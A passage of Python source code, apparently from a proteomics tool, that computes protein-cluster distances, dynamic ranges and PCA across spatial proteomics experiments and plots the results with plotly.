df_01_stacked = self.df_01_stacked
for clusters in self.markerproteins:
try:
df_setofproteins_allMaps = pd.DataFrame()
for marker in self.markerproteins[clusters]:
try:
df_marker_allMaps = df_01_stacked.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_setofproteins_allMaps = df_setofproteins_allMaps.append(df_marker_allMaps)
df_setofproteins_allMaps_median = df_setofproteins_allMaps["normalized profile"].unstack("Fraction").median()
df_dynamicRange = df_dynamicRange.append(pd.DataFrame(np.array([[max(df_setofproteins_allMaps_median),
min(df_setofproteins_allMaps_median),
max(df_setofproteins_allMaps_median)-min(df_setofproteins_allMaps_median),
clusters]]),
columns=["Max", "Min", "Dynamic Range", "Cluster"]),
ignore_index=True)
except:
continue
self.analysis_summary_dict["Dynamic Range"] = df_dynamicRange.to_json()
def plot_dynamic_range(self):
"""
Dynamic range of each individual protein cluster (of the median profile) across all maps is displayed.
Args:
self:
analysis_summary_dict["Dynamic Range"]: json-serialized df as stored by dynamic_range(), no index,
columns: "Max", "Min", "Dynamic Range", "Cluster"
Returns:
fig_dynamicRange: bar plot, displaying the dynamic range for each protein cluster
"""
fig_dynamicRange = px.bar(pd.read_json(self.analysis_summary_dict["Dynamic Range"]),
x="Cluster",
y="Dynamic Range",
base="Min",
template="simple_white",
width=1000,
height=500).update_xaxes(categoryorder="total ascending")
return fig_dynamicRange
def results_overview_table(self):
"""
Dataframe will be created that provides information about "range", "median" and "standardeviation"
(given as the column names) for each cluster and map, based on the data given in df_distance_noindex.
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex), index is reset. It contains the column "distance",
in which e.g. the Manhattan distances for each individual protein of the specified clusters (see self.markerproteins)
are stored
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...})
Returns:
df_overview: df, index: "Cluster" and "Map" (including "combined maps"), columns: "range", "median", "standardeviation";
also stored as json in self.analysis_summary_dict["Overview table"]
"""
df_distance_noindex = self.df_distance_noindex
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
map_names = self.map_names
df_overview = pd.DataFrame()
for clusters in self.markerproteins:
#if a certain cluster is not available in the dataset at all
try:
for maps in map_names:
df_dist_map_cluster = df_distance_map_cluster_gene_in_index.xs((clusters, maps), level=["Cluster", "Map"], drop_level=False)
statistic_table = {"range": (df_dist_map_cluster["distance"].max(axis=0)) - (df_dist_map_cluster["distance"].min(axis=0)),
"median": df_dist_map_cluster["distance"].median(axis=0),
"standardeviation": df_dist_map_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": maps
}
statistic_series = pd.Series(data=statistic_table)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
df_dist_cluster = df_distance_map_cluster_gene_in_index.xs(clusters, level="Cluster")
statistic_table_combined = {
"range": (df_dist_cluster["distance"].max(axis=0)) - (df_dist_cluster["distance"].min(axis=0)),
"median": df_dist_cluster["distance"].median(axis=0),
"standardeviation": df_dist_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": "combined maps"
}
statistic_series_combined = pd.Series(data=statistic_table_combined)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series_combined).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
except:
continue
try:
df_overview.set_index(["Cluster", "Map"], inplace=True)
df_overview.sort_index(axis=0, level=0, inplace=True)
except:
df_overview = pd.DataFrame()
self.analysis_summary_dict["Overview table"] = df_overview.reset_index().to_json()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#self.analysis_summary_dict.clear()
return df_overview
def reframe_df_01ORlog_for_Perseus(self, df_01ORlog):
""""
To be available for Perseus df_01_stacked needs to be reframed.
Args:
df_01ORlog:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
df_01ORlog_svm:
LFQ:
columns: "MS/MS count_Map1_01K", "normalized profile_Map1_01K"
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Compartment"
SILAC:
columns: e.g. "Ratio H/L count_MAP2_80K", "Ratio H/L variability [%]_MAP1_03K", "normalized profile_MAP5_03K"
index: "Q-value", "Score", "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "id", "Compartment"
"""
df_01ORlog_svm = df_01ORlog.copy()
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01ORlog_svm.index.get_level_values("Map")+"_"+df_01ORlog_svm.index.get_level_values("Fraction")
index_ExpMap.name = "Map_Frac"
df_01ORlog_svm.set_index(index_ExpMap, append=True, inplace=True)
df_01ORlog_svm.index = df_01ORlog_svm.index.droplevel(["Map", "Fraction"])
df_01ORlog_svm = df_01ORlog_svm.unstack("Map_Frac")
#df_01ORlog_svm = df_01ORlog_svm.dropna(axis=0, subset=df_01ORlog_svm.loc[[], ["normalized profile"]].columns)
df_01ORlog_svm.columns = ["_".join(col) for col in df_01ORlog_svm.columns.values]
df_01ORlog_svm.rename(index={"undefined" : np.nan}, level="Compartment", inplace=True)
return df_01ORlog_svm
class SpatialDataSetComparison:
analysed_datasets_dict = SpatialDataSet.analysed_datasets_dict
css_color = SpatialDataSet.css_color
cache_stored_SVM = True
def __init__(self, ref_exp="Exp2", **kwargs): #clusters_for_ranking=["Proteasome", "Lysosome"]
#self.clusters_for_ranking = clusters_for_ranking
self.ref_exp = ref_exp
self.json_dict = {}
#self.fractions, self.map_names = [], [] #self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
#collapse_maps,collapse_cluster, cluster_of_interest_comparison, multi_choice, multi_choice_venn, x_PCA_comp, y_PCA_comp
#if "organism" not in kwargs.keys():
# self.markerproteins = self.markerproteins_set["Human - Swissprot"]
#else:
# assert kwargs["organism"] in self.markerproteins_set.keys()
# self.markerproteins = self.markerproteins_set[kwargs["organism"]]
# del kwargs["organism"]
#self.unique_proteins_total = unique_proteins_total
self.exp_names, self.exp_map_names = [], []
self.df_01_filtered_combined, self.df_distance_comp = pd.DataFrame(), pd.DataFrame()
self.df_quantity_pr_pg_combined, self.df_dynamicRange_combined = pd.DataFrame(), pd.DataFrame()
def read_jsonFile(self): #, content=None
"""
Read-out of the JSON file and of the currently analysed dataset, stored in "analysed_datasets_dict". It will create df_distances_combined
("Gene names" and "Cluster" are stacked; "Map" and the experiment names, which are not stored under an additional level name, are unstacked).
The layout will be adjusted for distance plotting.
Args:
self.json_dict: contains the dictionary stored in AnalysedDatasets.json
{"Experiment name" : {
"changes in shape after filtering" : {
##SILAC##
"Original size" : tuple,
"Shape after categorical filtering" : tuple,
"Shape after Ratio H/L count (>= 3)/var (count>=2, var<30) filtering" : tuple,
"Shape after filtering for complete profiles" : tuple,
##LFQ/spectronaut##
"Original size" : tuple,
"Shape after MS/MS value filtering" : tuple,
"Shape after consecutive value filtering" : tuple,
},
"quantity: profiles/protein groups" : df - number of protein groups | number of profiles | data completeness of profiles
"Unique Proteins": list,
"Analysis parameters" : {
"acquisition" : str,
"filename" : str,
##SILAC##
"Ratio H/L count 1 (>= X)" : int,
"Ratio H/L count 2 (>=Y, var<Z)" : int,
"Ratio variability (<Z, count>=Y)" : int,
##LFQ/spectronaut##
"consecutive data points" : int,
"summed MS/MS counts" : int,
},
"0/1 normalized data - mean" : df - mean of all datapoints,
"0/1 normalized data" : df - individual cluster,
"Distances to the median profile" : df - individual cluster,
"Manhattan distances" : df - individual cluster,
"Dynamic Range": df - individual cluster,
"Overview table" : df - individual cluster,
##if the user performs the Misclassification Analysis before downloading the dictionary AnalysedDatasets.json##
{"Misclassification Analysis": {
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {
"Total - Recall": int,
"Membrane - Recall" : int,
"Av per organelle - Recall": int,
"Median per organelle - Recall" : int,
"Av precision organelles" : int,
"Av F1 organelles" : int,
"Av F1 all clusters" : int,
}
}
}
}
Returns:
self:
df_01_filtered_combined: df, "Fraction" is unstacked; "Experiment", "Gene names", "Map", "Exp_Map" are stacked
df_distance_comp: df, no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map", "Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
exp_map_names: list of unique Exp_Map - fusions e.g. LFQ_Map1
exp_names: list of unique Experiment names - e.g. LFQ
"""
json_dict = self.json_dict
#add experiments that are not stored in AnalysedDatasets.json for comparison
#try:
#if len(SpatialDataSet.analysed_datasets_dict.keys())>=1:
# json_dict.update(SpatialDataSet.analysed_datasets_dict)
##except:
#else:
# pass
self.analysis_parameters_total = {}
unique_proteins_total = {}
df_01_combined = pd.DataFrame()
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data":
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"], inplace=True)
if "Sequence" in df_01_toadd.columns:
df_01_toadd.set_index(["Sequence"], inplace=True, append=True)
df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")], axis=1, inplace=True)
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_toadd.set_index(pd.Series(["?".join([str(i) for i in el]) for el in df_01_toadd.index.values], name="join"), append=True, inplace=True)
if len(df_01_combined) == 0:
df_01_combined = df_01_toadd.copy()
else:
df_01_combined = pd.concat([df_01_combined,df_01_toadd], sort=False, axis=1)
elif data_type == "quantity: profiles/protein groups" and exp_name == list(json_dict.keys())[0]:
df_quantity_pr_pg_combined = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_combined["Experiment"] = exp_name
elif data_type == "quantity: profiles/protein groups" and exp_name != list(json_dict.keys())[0]:
df_quantity_pr_pg_toadd = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_toadd["Experiment"] = exp_name
df_quantity_pr_pg_combined = pd.concat([df_quantity_pr_pg_combined, df_quantity_pr_pg_toadd])
elif data_type == "Manhattan distances" and exp_name == list(json_dict.keys())[0]:
df_distances_combined = pd.read_json(json_dict[exp_name][data_type])
df_distances_combined = df_distances_combined.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_combined.columns:
df_distances_combined.set_index(["Sequence"], inplace=True, append=True)
df_distances_combined = df_distances_combined[["distance"]].unstack(["Map"])
df_distances_combined.rename(columns = {"distance":exp_name}, inplace=True)
elif data_type == "Manhattan distances" and exp_name != list(json_dict.keys())[0]:
df_distances_toadd = pd.read_json(json_dict[exp_name][data_type])
df_distances_toadd = df_distances_toadd.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_toadd.columns:
df_distances_toadd.set_index(["Sequence"], inplace=True, append=True)
df_distances_toadd = df_distances_toadd[["distance"]].unstack(["Map"])
df_distances_toadd.rename(columns = {"distance":exp_name}, inplace=True)
df_distances_combined = pd.concat([df_distances_combined, df_distances_toadd], axis=1)#, join="inner")
elif data_type == "Dynamic Range" and exp_name == list(json_dict.keys())[0]:
df_dynamicRange_combined = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_combined["Experiment"] = exp_name
elif data_type == "Dynamic Range" and exp_name != list(json_dict.keys())[0]:
df_dynamicRange_toadd = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_toadd["Experiment"] = exp_name
df_dynamicRange_combined = pd.concat([df_dynamicRange_combined, df_dynamicRange_toadd])
# if data_type == "Overview table" and exp_name == list(json_dict.keys())[0]:
# #convert into dataframe
# df_distanceOverview_combined = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_combined["Experiment"] = exp_name
# df_distanceOverview_combined = df_distanceOverview_combined.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
#
# elif data_type == "Overview table" and exp_name != list(json_dict.keys())[0]:
# df_distanceOverview_toadd = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_toadd["Experiment"] = exp_name
# df_distanceOverview_toadd = df_distanceOverview_toadd.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
# #dataframes will be concatenated, only proteins/Profiles that are in both df will be retained
# df_distanceOverview_combined = pd.concat([df_distanceOverview_combined, df_distanceOverview_toadd])
elif data_type == "Unique Proteins":
unique_proteins_total[exp_name] = json_dict[exp_name][data_type]
elif data_type == "Analysis parameters":
self.analysis_parameters_total[exp_name] = json_dict[exp_name][data_type]
#try:
# for paramters in json_dict[exp_name][data_type].keys():
# if paramters=="acquisition":
# acquisition_loaded.append(json_dict[exp_name][data_type][paramters])
# #elif parameters=="Non valid profiles":
#except:
# continue
#
df_01_combined = df_01_combined.droplevel("join", axis=0)
#filter for consistently quantified proteins (they have to be in all fractions and all maps)
#df_01_filtered_combined = df_01_mean_combined.dropna()
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
#reframe it to make it ready for PCA
df_01_filtered_combined = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
#df_01_filtered_combined = df_01_combined.stack(["Experiment"]).dropna(axis=1)
df_01_filtered_combined = df_01_filtered_combined.div(df_01_filtered_combined.sum(axis=1), axis=0)
#df_01_filtered_combined = df_01_combined.copy()
#df_01_filtered_combined.columns.names = ["Experiment", "Fraction", "Map"]
## Replace protein IDs by the unifying protein ID across experiments
#comparison_IDs = pd.Series([split_ids_uniprot(el) for el in df_01_filtered_combined.index.get_level_values("Protein IDs")],
# name="Protein IDs")
#df_01_filtered_combined.index = df_01_filtered_combined.index.droplevel("Protein IDs")
#df_01_filtered_combined.set_index(comparison_IDs, append=True, inplace=True)
##reframe it to make it ready for PCA | dropna: to make sure, that you do consider only fractions that are in all experiments
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01_filtered_combined.index.get_level_values("Experiment")+"_"+df_01_filtered_combined.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df_01_filtered_combined.set_index(index_ExpMap, append=True, inplace=True)
df_distances_combined.columns.names = ["Experiment", "Map"]
series = df_distances_combined.stack(["Experiment", "Map"])
series.name = "distance"
df_distance_comp = series.to_frame()
#fuse Experiment and Map into one column = "Exp_Map"
index_dist_ExpMap = df_distance_comp.index.get_level_values("Experiment")+"_"+df_distance_comp.index.get_level_values("Map")
index_dist_ExpMap.name = "Exp_Map"
df_distance_comp.set_index(index_dist_ExpMap, append=True, inplace=True)
#new
#self.df_distance_comp2 = df_distance_comp.copy()
df_distance_comp.reset_index(level=['Protein IDs'], inplace=True)
df_distance_comp["Protein IDs"] = df_distance_comp["Protein IDs"].str.split(";", expand=True)[0]
df_distance_comp = df_distance_comp.set_index("Protein IDs", append=True).unstack(["Experiment", "Exp_Map", "Map"]).dropna().stack(["Experiment", "Exp_Map", "Map"]).reset_index()
#df_distance_comp.reset_index(inplace=True)
self.unique_proteins_total = unique_proteins_total
self.exp_names = list(df_01_filtered_combined.index.get_level_values("Experiment").unique())
self.exp_map_names = list(index_dist_ExpMap.unique())
self.df_01_filtered_combined = df_01_filtered_combined
#self.df_01_mean_filtered_combined = df_01_mean_filtered_combined
self.df_quantity_pr_pg_combined = df_quantity_pr_pg_combined
self.df_dynamicRange_combined = df_dynamicRange_combined
self.df_distance_comp = df_distance_comp
try:
organism = json_dict[list(json_dict.keys())[0]]["Analysis parameters"]['organism']
except:
organism = "Homo sapiens - Uniprot"
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(organism)))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.clusters_for_ranking = self.markerproteins.keys()
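# Typical usage (a sketch; the file name "AnalysedDatasets.json" is an assumption):
# import json
# comp = SpatialDataSetComparison(ref_exp="Exp2")
# with open("AnalysedDatasets.json") as f:
#     comp.json_dict = json.load(f)
# comp.read_jsonFile()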
def perform_pca_comparison(self):
"""
PCA will be performed, using 0/1 normalized data averaged across the maps of each experiment.
Args:
self:
df_01_filtered_combined: df, which contains 0/1 normalized data for each map - for all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Protein IDs", "Gene names", "Compartment", "Experiment", "Map", "Exp_Map"
exp_names: list of unique experiment names
Returns:
self:
df_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment"
columns: "PC1", "PC2", "PC3"
contains only proteins that are consistently quantified throughout all maps/experiments
df_global_pca: df_pca merged with the marker cluster annotation
no index; columns: the former index levels (e.g. "Gene names", "Protein IDs", "Compartment", "Experiment"),
"PC1", "PC2", "PC3" and "Cluster"
"""
markerproteins = self.markerproteins.copy()
#df_01_filtered_combined = self.df_01_filtered_combined
#df_01_filtered_combined = self.df_01_filtered_combined
df_mean = pd.DataFrame()
for exp in self.exp_names:
df_exp = self.df_01_filtered_combined.stack("Fraction").unstack(["Experiment", "Map","Exp_Map"])[exp].mean(axis=1).to_frame(name=exp)
df_mean = pd.concat([df_mean, df_exp], axis=1)
df_mean = df_mean.rename_axis("Experiment", axis="columns").stack("Experiment").unstack("Fraction")
pca = PCA(n_components=3)
df_pca = pd.DataFrame(pca.fit_transform(df_mean))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_mean.index
try:
markerproteins["PSMA subunits"] = [item for sublist in [re.findall("PSMA.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
markerproteins["PSMB subunits"] = [item for sublist in [re.findall("PSMB.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
del markerproteins["Proteasome"]
except:
pass
###only one df, make annotation at that time
df_cluster = pd.DataFrame([(k, i) for k, l in markerproteins.items() for i in l], columns=["Cluster", "Gene names"])
df_global_pca = df_pca.reset_index().merge(df_cluster, how="left", on="Gene names")
df_global_pca.Cluster.replace(np.NaN, "Undefined", inplace=True)
self.markerproteins_splitProteasome = markerproteins
self.df_pca = df_pca
self.df_global_pca = df_global_pca
def plot_pca_comparison(self, cluster_of_interest_comparison="Proteasome", multi_choice=["Exp1", "Exp2"]):
"""
A PCA plot for desired experiments (multi_choice) and 1 desired cluster is generated.
Either the maps for every single experiment are displayed individually or in a combined manner
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
multi_choice: list of experiment names
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
df_pca: PCA processed dataframe
index: "Experiment", "Gene names", "Map", "Exp_Map"
columns: "PC1", "PC2", "PC3"
contains only marker genes, that are consistent throughout all maps / experiments
Returns:
pca_figure: PCA plot for a specified protein cluster.
"""
df_pca = self.df_pca.copy()
markerproteins = self.markerproteins
try:
df_setofproteins_PCA = pd.DataFrame()
for map_or_exp in multi_choice:
for marker in markerproteins[cluster_of_interest_comparison]:
try:
plot_try_pca = df_pca.xs((marker, map_or_exp), level=["Gene names", "Experiment"], drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
df_setofproteins_PCA = df_setofproteins_PCA.assign(Experiment_lexicographic_sort=pd.Categorical(df_setofproteins_PCA["Experiment"], categories=multi_choice,
ordered=True))
df_setofproteins_PCA.sort_values("Experiment_lexicographic_sort", inplace=True)
pca_figure = px.scatter_3d(df_setofproteins_PCA,
x="PC1",
y="PC2",
z="PC3",
color="Experiment",
template="simple_white",
hover_data=["Gene names"]
)
pca_figure.update_layout(autosize=False,
width=700,
height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
template="simple_white"
)
return pca_figure
except:
return "This protein cluster was not identified in all experiments"
def plot_global_pca_comparison(self, cluster_of_interest_comparison="Proteasome", x_PCA="PC1", y_PCA="PC3",
markerset_or_cluster=False, multi_choice=["Exp1", "Exp2"]):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
multi_choice: list of experiment names
css_color: list of colors
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
Returns:
pca_figure: global PCA plot; compartments of the organellar marker set (df_organellarMarkerSet) or the marker clusters are color coded.
"""
df_global_pca_exp = self.df_global_pca.loc[self.df_global_pca["Experiment"].isin(multi_choice)]
df_global_pca_exp.reset_index(inplace=True)
compartments = list(SpatialDataSet.df_organellarMarkerSet["Compartment"].unique())
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
compartments.insert(0, "undefined")
compartments.insert(len(compartments), "Selection")
cluster = self.markerproteins_splitProteasome.keys()
cluster_color = dict(zip(cluster, self.css_color))
cluster_color["Undefined"] = "lightgrey"
if markerset_or_cluster == True:
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster!="Undefined"].sort_values(by="Cluster")
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster=="Undefined"].append(df_global_pca)
else:
for i in self.markerproteins[cluster_of_interest_comparison]:
df_global_pca_exp.loc[df_global_pca_exp["Gene names"] == i, "Compartment"] = "Selection"
df_global_pca = df_global_pca_exp.assign(Compartment_lexicographic_sort = pd.Categorical(df_global_pca_exp["Compartment"],
categories=[x for x in compartments],
ordered=True))
df_global_pca.sort_values(["Compartment_lexicographic_sort", "Experiment"], inplace=True)
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment" if markerset_or_cluster == False else "Cluster",
color_discrete_map=compartment_color if markerset_or_cluster == False else cluster_color,
title="Protein subcellular localization by PCA",
hover_data=["Protein IDs", "Gene names", "Compartment"],
facet_col="Experiment",
facet_col_wrap=2,
opacity=0.9,
template="simple_white"
)
fig_global_pca.update_layout(autosize=False,
width=1800 if markerset_or_cluster == False else 1600,
height=400*(int(len(multi_choice) / 2) + (len(multi_choice) % 2 > 0)),
template="simple_white"
)
return fig_global_pca
def get_marker_proteins(self, experiments, cluster):
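"""
Collects the 0/1 normalized profiles of all members of one marker cluster.
Args:
experiments: list of experiment names to retain
cluster: str, key in self.markerproteins
Returns:
df_cluster: df, rows: cluster members quantified in all maps of all selected experiments,
columns: MultiIndex (Fraction x Experiment x Map), index extended by a "Cluster" level;
an empty df is returned if the cluster is not (fully) covered in the selected experiments
"""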
df_in = self.df_01_filtered_combined.copy()
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster = df_cluster.append(df_p)
if len(df_cluster) == 0:
return df_cluster
# filter for all selected experiments
df_cluster = df_cluster.droplevel("Exp_Map", axis=0)
df_cluster = df_cluster.unstack(["Experiment", "Map"])
if any([el not in df_cluster.columns.get_level_values("Experiment") for el in experiments]):
return pd.DataFrame()
drop_experiments = [el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments]
if len(drop_experiments) > 0:
df_cluster.drop(drop_experiments, level="Experiment", axis=1, inplace=True)
df_cluster.dropna(inplace=True)
if len(df_cluster) == 0:
return df_cluster
df_cluster.set_index(pd.Index(np.repeat(cluster, len(df_cluster)), name="Cluster"), append=True, inplace=True)
return df_cluster
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
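"""
Calculates per-protein distances to a reference complex profile, separately for each experiment and map.
Args:
df_cluster: df as returned by get_marker_proteins, columns: MultiIndex (Fraction x Experiment x Map)
complex_profile: function used to build the reference profile per fraction and map (default: np.median)
distance_measure: str, currently only "manhattan" is supported
Returns:
df_distances: df, same index as df_cluster, columns: MultiIndex (Experiment x Map), Manhattan distances
"""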
df_distances = pd.DataFrame()
# loop over experiments
experiments = set(df_cluster.columns.get_level_values("Experiment"))
for exp in experiments:
df_exp = df_cluster.xs(exp, level="Experiment", axis=1)
ref_profile = pd.DataFrame(df_exp.apply(complex_profile, axis=0, result_type="expand")).T
# loop over maps
maps = set(df_exp.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_exp.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[(exp, m)], index=df_exp.index)
df_distances = pd.concat([df_distances, d_m], axis=1)
df_distances.columns = pd.MultiIndex.from_tuples(df_distances.columns, names=["Experiment", "Map"])
return df_distances
def calc_biological_precision(self, experiments=None, clusters=None):
"""
Method to calculate the distance table for assessing biological precision
"""
df_distances = pd.DataFrame()
if experiments is None:
experiments = self.exp_names
if clusters is None:
clusters = self.markerproteins.keys()
for cluster in clusters:
df_cluster = self.get_marker_proteins(experiments, cluster)
if len(df_cluster) == 0:
continue
dists_cluster = self.calc_cluster_distances(df_cluster)
df_distances = df_distances.append(dists_cluster)
df_distances = df_distances.stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment","Gene names"]).rename({0: "distance"}, axis=1)
df_distances.insert(0, "Exp_Map", ["_".join([e,m]) for e,m in zip(df_distances["Experiment"], df_distances["Map"])])
self.df_distance_comp = df_distances
return df_distances
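# Example call (a sketch; 'comp' is a SpatialDataSetComparison instance on which read_jsonFile() has been run):
# df_bp = comp.calc_biological_precision(experiments=comp.exp_names, clusters=["Proteasome"])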
def get_complex_coverage(self, min_n=5):
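"""
Categorizes marker complexes by quantification coverage.
Args:
min_n: int, minimal number of quantified members a complex needs to count as covered
Returns:
full_coverage: dict, complexes with >= min_n members quantified across all experiments (value: member count)
partial_coverage: dict, complexes reaching min_n members only in some experiments (value: list of counts per experiment)
no_coverage: dict, complexes below min_n members in every experiment (value: list of counts per experiment)
"""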
full_coverage = {}
for complx in self.markerproteins.keys():
df = self.get_marker_proteins(self.exp_names, complx)
if len(df) >= min_n:
full_coverage[complx] = len(df)
partial_coverage = {}
for exp in self.exp_names:
for complx in self.markerproteins.keys():
if complx in full_coverage.keys():
continue
df = self.get_marker_proteins([exp], complx)
#print(df)
if complx in partial_coverage.keys():
partial_coverage[complx].append(len(df))
else:
partial_coverage[complx] = [len(df)]
no_coverage = {}
for k in partial_coverage.keys():
if all([el < min_n for el in partial_coverage[k]]):
no_coverage[k] = partial_coverage[k]
for k in no_coverage.keys():
del partial_coverage[k]
self.coverage_lists = [full_coverage, partial_coverage, no_coverage]
return full_coverage, partial_coverage, no_coverage
def distance_boxplot_comparison(self, cluster_of_interest_comparison="Proteasome", collapse_maps=False, multi_choice=["Exp1", "Exp2"]):
"""
A box plot for desired experiments (multi_choice) and 1 desired cluster is generated displaying the distribution of the e.g.
Manhattan distance. Either the maps for every single experiment are displayed individually or in a combined manner.
Args:
self:
multi_choice: list of experiment names
collapse_maps: boolean
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
map_names: individual map names are stored as an index
df_distance_comp: df_distance_comp: no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map",
"Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
#an error message is already displayed if no experiments are selected, that is why: return ""
if len(multi_choice) < 1:
return ""
df_distance_comp = self.df_distance_comp.copy()
#set categorical column, allowing lexicographic sorting
df_distance_comp["Experiment_lexicographic_sort"] = pd.Categorical(df_distance_comp["Experiment"], categories=multi_choice, ordered=True)
df_distance_comp.sort_values(["Experiment_lexicographic_sort", "Map"], inplace=True)
if collapse_maps == False:
#get only values from the experiments of interest
df_distance_selectedExp = df_distance_comp.loc[df_distance_comp["Experiment"].isin(multi_choice)]
#get only values from the cluster of interest
df_distance_selectedExp = df_distance_selectedExp.loc[df_distance_selectedExp["Cluster"]==cluster_of_interest_comparison]
if df_distance_selectedExp.shape[0] == 0:
self.cache_cluster_quantified = False
else:
individual_distance_boxplot_figure=go.Figure()
for i, exp in enumerate(multi_choice):
df_plot=df_distance_selectedExp[df_distance_selectedExp["Experiment"]==exp]
individual_distance_boxplot_figure.add_trace(go.Box(
x=[df_plot["Experiment"], df_plot["Map"]],
y=df_plot["distance"],
#line=dict(color=pio.templates["simple_white"].layout["colorway"][i]),
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
name=exp,
hovertext=df_plot["Gene names"]
))
individual_distance_boxplot_figure.update_layout(boxmode="group",
xaxis_tickangle=90,
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
autosize=False,
width=350*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Experiment",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Distance",
mirror=True),
template="simple_white")
return individual_distance_boxplot_figure
else:
map_or_exp_names = multi_choice
level_of_interest = "Experiment"
boxplot_color = "Experiment"
df_distance_selectedExp_global = df_distance_comp
# "Gene names", "Map", "Cluster" and transferred into the index
